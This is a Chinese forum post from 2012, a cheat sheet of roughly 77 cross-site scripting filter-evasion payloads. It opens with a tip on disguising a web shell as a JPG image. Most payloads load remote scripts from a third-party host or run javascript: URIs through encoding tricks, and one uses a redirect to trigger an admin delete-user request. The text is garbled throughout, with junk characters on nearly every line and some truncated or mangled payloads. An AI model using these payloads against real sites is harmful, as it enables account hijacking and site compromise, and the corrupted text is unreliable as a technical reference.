跨站图片shell
0 s7 R! c% v1 }XSS跨站代码 <script>alert("")</script>
' y8 K- t- P- A* ^6 U& M! b* N5 u) t, X
+ |9 q$ [* [8 [将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
" J2 f, {3 c; s" g
! P$ V' N0 ^1 q" f" G; j' r- E4 R! c2 g
: J% L7 j& Z$ u* T1 S
1)普通的XSS JavaScript注入
8 H- o. `/ B3 r, ~6 v: Y<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 `6 ?' u* { C& k9 }1 G. r) Z* _' V6 ~$ r! x/ \! P3 v
(2)IMG标签XSS使用JavaScript命令
' `+ d: }9 y; @0 H$ ?<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 ] m9 g9 T/ o1 t8 s- c
! z% J- Y0 l4 @4 \4 S(3)IMG标签无分号无引号
n5 S6 g3 Q' z* {, o- N<IMG SRC=javascript:alert(‘XSS’)>
4 Z7 `1 n# g }5 e6 K* r
) Z) L6 D/ I/ c( I0 V& r(4)IMG标签大小写不敏感
/ n& S! I7 o# o# ]<IMG SRC=JaVaScRiPt:alert(‘XSS’)>% N$ E2 B6 `2 h7 O/ J3 m2 `
1 {: I% C- R7 |( Z# Z- H(5)HTML编码(必须有分号): [6 `/ K/ j% l- s
<IMG SRC=javascript:alert(“XSS”)>2 X! ~: k4 |0 }# t4 X) I3 P+ V- u
7 W0 {: ]" u3 ]& h. f0 y D5 ]8 X
(6)修正缺陷IMG标签
; Q9 ?9 [& i! E6 G( j5 F) J: r% V<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! A/ Y: T$ u( G* E# f
3 y3 R) r3 r+ h1 Y5 I
(7)formCharCode标签(计算器)
3 O9 b) t" F# Q' T! }, A<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 H3 H' P+ A+ e0 A1 y, n" i9 k" ~4 f/ }9 P
& f' q1 x/ L# g1 E4 c& d C u(8)UTF-8的Unicode编码(计算器)
: y- D% b, W' p4 s1 u! R- Q<IMG SRC=jav..省略..S')>
; Q; V1 j( m% z6 x) {5 i! `: u9 m2 i( g
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 S9 {" H9 s$ ?: c
<IMG SRC=jav..省略..S')>/ ~( {5 @* K: t- t4 y0 ?9 C
, P; i8 U! s+ \1 v, ?; @
(10)十六进制编码也是没有分号(计算器) z6 n6 S, l' V
<IMG SRC=java..省略..XSS')>. J6 W# g/ x3 r c
& u; X l0 l* u5 V+ L2 u( G5 ]
(11)嵌入式标签,将Javascript分开 @' X5 H7 v( y; g+ G/ N3 T
<IMG SRC=”jav ascript:alert(‘XSS’);”>* w$ i4 h3 z9 k
6 h/ @0 N8 y0 o- i- K: r# z/ {# S
(12)嵌入式编码标签,将Javascript分开; K7 f( Y% {+ p$ Y. x1 @
<IMG SRC=”jav ascript:alert(‘XSS’);”>: w# V& O: I. M4 z( Y, \
$ J- Z+ C5 U9 P& j5 g' E% j
(13)嵌入式换行符
/ B6 ^* {1 \8 G& e" W' |: ]<IMG SRC=”jav ascript:alert(‘XSS’);”>
! Y7 g$ @" _# _- [- x5 H F1 M
* P0 l+ k" `4 B4 q! \/ J/ O(14)嵌入式回车 t6 m! g! |( ?8 A& q' e
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ G8 U4 @. T" L8 P8 N! ]" F
: M. f7 C0 Q4 F5 ~& s6 I! X(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 I u. R4 ], W7 z<IMG SRC=”javascript:alert(‘XSS‘)”>
9 r" `+ o: Y0 R
; ^+ z9 o1 W: x(16)解决限制字符(要求同页面)
% j; u# y, m0 p9 A<script>z=’document.’</script>' r% V+ ?! V; C7 l( k* R8 N
<script>z=z+’write(“‘</script>
j8 }6 p8 G* R. j0 [<script>z=z+’<script’</script>
' a% a7 W3 |+ y. n; B* c<script>z=z+’ src=ht’</script>
' {# p8 r5 j2 @0 Q K<script>z=z+’tp://ww’</script> q0 m6 {. P3 l' t( ?$ F
<script>z=z+’w.shell’</script>, Z) F( R4 F- U: p& a7 b; h; `
<script>z=z+’.net/1.’</script>
, Z* i- l- y) T% `1 ?<script>z=z+’js></sc’</script>
1 h) q. H' Z/ M! U8 d<script>z=z+’ript>”)’</script>( K! M$ e; E* j- F6 r! }! H& Q3 }7 W
<script>eval_r(z)</script>
. ]7 X! J' w# Y5 D2 ?' e4 C; L6 ]6 X6 M
(17)空字符
7 i& x/ a# {: m0 i& Uperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; `9 O. ]- n8 M3 ^( @# d
4 S4 C7 q% E& _3 {6 P# t4 B/ L(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* J# G% O; T3 j. x0 k% Z8 Eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 [5 U4 f0 e; T8 y$ y, q1 S! w6 l
" Y7 i3 p. ]* P2 S
(19)Spaces和meta前的IMG标签8 j- [/ p/ a4 r+ E% X
<IMG SRC=” javascript:alert(‘XSS’);”>0 _" \5 Z8 H4 K9 P' `
6 J4 O, i1 r: ?. N l
(20)Non-alpha-non-digit XSS
# B: @6 F' b8 w& G: s8 p; ?5 G<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" H$ I& o5 W3 Q6 J6 A( R8 K
. d: s2 k5 |. @" j( c(21)Non-alpha-non-digit XSS to 2
4 B5 q3 B; T) Z$ r/ b<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
" r# z/ j1 u, H! ]. ~% Z1 {. M$ o ~2 h1 h4 [
(22)Non-alpha-non-digit XSS to 3
y* R! U, z$ W- k/ }( l: f9 ?+ n<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>0 x9 O# A2 m. a3 I5 ~* a B
+ w( n K( S2 J) E: t" }8 q
(23)双开括号5 Z6 Z8 S) a% B, p3 a8 o
<<SCRIPT>alert(“XSS”);//<</SCRIPT>2 K1 ^$ e5 Z) `& S g5 \
6 A/ _% L( l2 j
(24)无结束脚本标记(仅火狐等浏览器)6 R4 \; o7 F) X1 E/ r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
D8 ` G3 b0 ^( l8 Q0 p% B3 z! |+ z; X1 B
(25)无结束脚本标记2
! D4 t2 K$ H0 W<SCRIPT SRC=//3w.org/XSS/xss.js>
5 y0 G8 ~9 P4 P" i/ h2 [& ?
/ v! Z/ m/ Y, V" j. [$ G1 @, ](26)半开的HTML/JavaScript XSS
3 {' y V5 a* v s) r) k/ T<IMG SRC=”javascript:alert(‘XSS’)”, g+ {# {4 R6 A7 a% i2 T' t7 \ S" V3 V% L
+ J& U4 ^+ E% b- c(27)双开角括号
: g( y& J8 j9 }+ ]5 f<iframe src=http://3w.org/XSS.html <
! _$ u! J: m$ t; X8 ~; T1 E: C5 K9 c/ R: c( F
(28)无单引号 双引号 分号
- {* r; i- U" U9 V. b1 P9 T<SCRIPT>a=/XSS/
4 d, S" C+ [& w ~/ oalert(a.source)</SCRIPT>
# L" s. E0 S' Y# z* }6 k4 e8 }
' M5 S: s& e7 O7 d3 i(29)换码过滤的JavaScript
, @( U4 r' |+ ~ [6 @5 P\”;alert(‘XSS’);//
* V, p& K; j; r5 d
! G9 v+ }3 s& q2 R(30)结束Title标签
4 E4 y d/ N% O</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* }5 E; J+ }# w% y
/ `% G) F+ x# ?' Z9 V3 n8 b! M: ?+ Z(31)Input Image
! B% h% m% o0 K/ H0 E<INPUT SRC=”javascript:alert(‘XSS’);”>9 b' x4 E7 {. L/ f- N0 H
3 t, F' a$ X* x(32)BODY Image
+ t& d; ?. i" K1 m- o9 Z+ F<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 B) @5 Q- R" M9 |2 _, `+ m
. q/ F% l3 u! \, U) b(33)BODY标签
; n/ M& D& \" h: ?/ @5 d0 i6 l<BODY(‘XSS’)>
$ t9 Y& d; ~( B6 X# ~6 N: a& p. r6 z' {
(34)IMG Dynsrc1 I: Z7 d4 i! x- I" |# H
<IMG DYNSRC=”javascript:alert(‘XSS’)”>9 t; |0 J9 T k1 r2 `
4 }& i' q. f; H. g
(35)IMG Lowsrc
M+ b4 H2 L" m' Z<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ a* @7 d3 S) s) \) @& K' {
& I* T! o6 ?5 b m
(36)BGSOUND
) X5 f5 _* `8 G0 ?$ t' a<BGSOUND SRC=”javascript:alert(‘XSS’);”>
3 }- C7 t1 K+ ^( S$ @
. U& |" t; i% g8 z(37)STYLE sheet
& o( d: H" r+ ~9 G; h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 G# V; p, G( S' D. K8 i
* S7 ?. ~5 F# Z* T(38)远程样式表
" Y( \7 m; {% R4 B0 n<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 k; V" r# k! K; r) [1 s1 W
6 d. A3 H' I: w' O/ R7 T(39)List-style-image(列表式)
' B) {2 ^# | B. r<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 F. g0 @5 x5 `' Y4 W( t; Q) i: z" B3 P9 O; }
(40)IMG VBscript
1 k& }7 F4 {+ j1 o0 C<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS: a3 |; J6 f6 z6 e. ]
- B/ B- G" J4 ?8 c4 u
(41)META链接url
$ L8 y5 z1 l2 G* d<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
: j U, X6 |, `0 ~0 `' e# V
* ^5 c* l& u& t- w" O2 x) i(42)Iframe
- [7 d- o- x4 y* V$ h, C% K; b$ w4 H<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 |: ^' {9 }' r(43)Frame
6 R5 y2 o, b+ \/ ?- N$ ~( F: ~<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>' Y$ L2 f4 p' P- j- n7 T0 E6 b
) v2 ]6 b2 l: v9 C
(44)Table
0 a4 R! n/ ?% `2 u0 p* i<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. F" l* [- ]+ B; I# r4 C7 N
- x+ J% D, p/ ~6 d7 y" F
(45)TD7 |6 _+ u) z7 n, h
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
6 T- T' D+ H3 m1 q- f5 C
& U' p `" S' \& E. ^3 Z(46)DIV background-image8 h2 H5 E. u) [& `) o3 `8 z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( v: }% t, t! {6 L+ u
5 |. w' w9 |6 \( d$ [, ~6 x(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 P6 I j" k0 o3 a: T0 [/ \" E9 h<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”> _6 Y7 P2 Z1 F; G4 D* o% b
6 h0 y% a+ u0 e! Z0 R' @
(48)DIV expression
6 ?' _( ~! ]9 C) i<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 }/ O3 ]- \5 b( e& ]6 ]3 E6 d8 H# W+ G% u) [
(49)STYLE属性分拆表达9 I; N5 i% ?0 Z- G
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; C$ S* S r: C u. X& N, A/ A5 e/ M7 J+ T" |9 W
(50)匿名STYLE(组成:开角号和一个字母开头)
% u, V( h: Y7 c<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, Z' O d5 r4 @& G: h3 G- T/ b* M* M o( _0 f# T% s8 f
(51)STYLE background-image& z& {: a$ @2 H! |
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 l3 Y- E: G( n) ~ x0 s. `- B
( Q- r! Y5 o6 [7 [(52)IMG STYLE方式
' }7 f/ r9 O2 M0 u4 h& bexppression(alert(“XSS”))’>
7 H6 T) |/ i% e H8 L% A+ b
) e' o* v: ^! D(53)STYLE background) M: i4 V/ Q: m& w
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ b! I1 X' @: M* Z& @( |4 R# n# C+ S( U+ A7 [' ^' `/ y( U
(54)BASE
8 I6 q n ~+ U u<BASE HREF=”javascript:alert(‘XSS’);//”>8 k7 m) U3 @+ K- P- c
6 N3 r! ]3 p% ? K% t(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
m+ ~' R1 X0 P7 F0 c- X' F9 {<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>! d3 m7 U9 b8 I X5 E( Y' \
' C- `0 }) u: r( _) Z3 `
(56)在flash中使用ActionScrpt可以混进你XSS的代码& ^' ^. K5 G5 P7 H! z* V
a=”get”;
8 s- ~" G l' ]b=”URL(\”";5 E& `0 h, D2 w, B g6 A
c=”javascript:”;
( ?: f# p- W( V; Xd=”alert(‘XSS’);\”)”;
: L# {' I* _* u- g& @+ Yeval_r(a+b+c+d);
' B K. y7 T9 i) l5 I" r/ M0 m/ B8 v. j! `( N* {
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上3 t# E- a: @$ y7 I) V
<HTML xmlns:xss>
* V* z7 K2 P4 p- t( I$ X<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 r2 K" p* W& D4 H8 S5 k
<xss:xss>XSS</xss:xss>2 b% X. l. k( E, q( A7 l
</HTML>
4 ^2 y6 i& A- @1 f2 w6 h! N4 C/ b
) p6 e% v8 z' ] }2 f$ r(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ ?" p) P; T" R! a
<SCRIPT SRC=””></SCRIPT>
* q% {) p7 a. K
6 q8 O8 ~+ t8 W% w8 y# G6 K. }8 N(59)IMG嵌入式命令,可执行任意命令
# R* ] s+ K- e9 G. b3 |! o<IMG SRC=”http://www.XXX.com/a.php?a=b”># [3 D7 G5 _3 c, K5 m( s
K$ z5 s4 X7 [4 h+ L2 J! \9 O
(60)IMG嵌入式命令(a.jpg在同服务器)5 M/ V' H" Q3 g4 \& K$ Y
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser f& G/ O: G+ _$ y
: B( t- E- A, q8 F& e7 I
(61)绕符号过滤
; J# o& u5 X7 M0 Q+ v<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># I! Q+ I4 M) d8 U5 P3 K# O
+ a( w) j h% ?+ [7 ?6 c7 A
(62) E) x( d6 `: ?. [$ r
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 G# j( [+ [" N, c q* ~
4 |* ^! \7 G9 j' c( |9 C
(63)
: V3 B6 v. ~, |) M O- x<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# Y* w- y4 t# k S3 u% R
: {& L* H& I: O( b! i# i" H(64)
1 }0 x) g* p/ M- I1 z3 V* R: X<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 ]& m- Z/ D+ R+ l. C4 }5 D* ~9 x0 F6 M2 `7 E' y
(65)# d5 b+ @( B# {' x B4 E2 v8 K' _& ~
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
4 K* {6 z% T0 ^* W8 j
2 b) u f- P; \, I(66)+ Z0 A- p# V) b; v6 r% }* @% O, |
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 Z3 `- u( X+ c+ h: J9 K# L/ g+ G( E1 n
(67)/ i' W8 N4 ^. g
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>. w" I3 O/ r; Z" q5 x/ {! t7 ~: ]
* n9 G4 i- e4 b' ^' w' m) J+ }$ ~" ^& Y(68)URL绕行
) Y$ ^+ D8 d- r! s* H4 F' r<A HREF=”http://127.0.0.1/”>XSS</A>
6 M; t# V. @. \, A# E" W1 x8 Y# O# k0 F) V* W
(69)URL编码
" `! S4 Z; h( q: w y3 n<A HREF=”http://3w.org”>XSS</A>
/ \: ?/ N, a5 D
+ ?+ w0 E) [, v7 _/ N) A* Z- m(70)IP十进制' X' i* D* R3 _/ y
<A HREF=”http://3232235521″>XSS</A>
) Z7 h4 w. v# Z. V: Y8 Q/ R! ^1 h' j* u( n; [( p2 r7 k
(71)IP十六进制5 H7 X5 M* q, c* B- _
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>+ s# L Y8 k* N5 M% ` i# t8 ?
* M* U# N" ~0 p j! y( C R(72)IP八进制2 K' n* F" H/ l. ^7 U/ J5 Y* B) f
<A HREF=”http://0300.0250.0000.0001″>XSS</A>1 d+ f0 Q( ?4 L* {3 H
, ]6 o" F+ R0 Z9 o5 A+ x. u3 ](73)混合编码, u! g+ @: g+ S9 _- b8 m6 a% J
<A HREF=”h
) k; b$ ]7 i9 @/ Qtt p://6 6.000146.0×7.147/”">XSS</A>0 F5 T4 P, C9 V" b
, g3 U/ w4 `5 B
(74)节省[http:]
$ R: E% ]. a+ s7 u5 `! Y) h<A HREF=”//www.google.com/”>XSS</A>8 p5 V2 e* O: l6 A$ C% W
! g. I& v3 h2 ]7 Q6 E7 ]7 V( ~(75)节省[www]8 H7 i3 C7 `+ z+ y
<A HREF=”http://google.com/”>XSS</A>! J0 p8 Y# I! K& ^" {
3 `' W& }3 u/ D8 s$ \$ C/ R
(76)绝对点绝对DNS: T% R4 U* ^% z2 o9 k3 Z
<A HREF=”http://www.google.com./”>XSS</A>
j# z5 A+ f: @# L; T: i
# A5 t. Q- S3 Z7 j7 U9 A(77)javascript链接
6 d8 z6 U; X; F& q3 R3 G6 |<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
8 _6 ^% u9 ?1 ?% C' a |
发表于 2012-9-13 17:04:56
收藏
支持
反对